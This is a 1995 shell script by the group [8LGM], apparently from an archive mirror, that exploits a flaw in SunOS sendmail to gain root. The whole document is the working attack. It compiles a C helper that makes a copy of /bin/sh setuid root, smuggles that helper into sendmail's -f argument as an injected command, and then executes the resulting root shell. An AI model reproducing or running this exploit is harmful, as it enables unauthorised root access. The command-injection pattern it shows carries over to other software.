home *** CD-ROM | disk | FTP | other *** search
- #!/bin/sh
- #
- # Syntax: roption host
- #
- # host is any system running sendmail (except localhost).
- #
- # This exploits a flaw in SunOS sendmail(8), and attempts
- # create a suid root shell
- #
- # Written 1995 by [8LGM]
- # Please do not use this script without permission.
- #
- #
- #
- #**************************************************************************
- # HACK: Sendmail(8): Create suid root shells [8lgm]
- # System: SunOS
- # Source: [8lgm] at webserv@FOUR.net
- # Date: Aug 24,1995
- #**************************************************************************
- #
-
- PROG="`basename $0`"
- PATH=/usr/ucb:/usr/bin:/bin export PATH
- IFS=" " export IFS
-
- # Check args
- if [ $# -ne 1 ]; then
- echo "Syntax: $PROG host"
- exit 1
- fi
-
- # Check we're on SunOS
- if [ "x`uname -s`" != "xSunOS" ]; then
- echo "Sorry, this only works on SunOS"
- exit 1
- fi
-
- PROG="`basename $0`"
-
- EXECME=/tmp/HotterThanMojaveInMyHeart
-
- # Create EXECME.c
-
- cat > $EXECME.c << 'EOF'
- main(argc,argv)
- int argc;
- char *argv[];
- {
- chown("/tmp/InfamousAngel", 0, 0);
- chmod("/tmp/InfamousAngel", 04755);
- }
- EOF
-
- cc -o $EXECME $EXECME.c
-
- # Check we have EXECME
-
- if [ ! -x $EXECME ]; then
- echo "$PROG: couldnt compile $EXECME.c - check it out"
- exit 1
- fi
-
- /bin/cp /bin/sh /tmp/InfamousAngel
- # Run sendmail
-
- /usr/lib/sendmail -oR$1 -f";$EXECME;" -t << 'EOF'
- To: No1InParticular
-
- Hows it goin
- EOF
-
- exec /tmp/InfamousAngel
-
-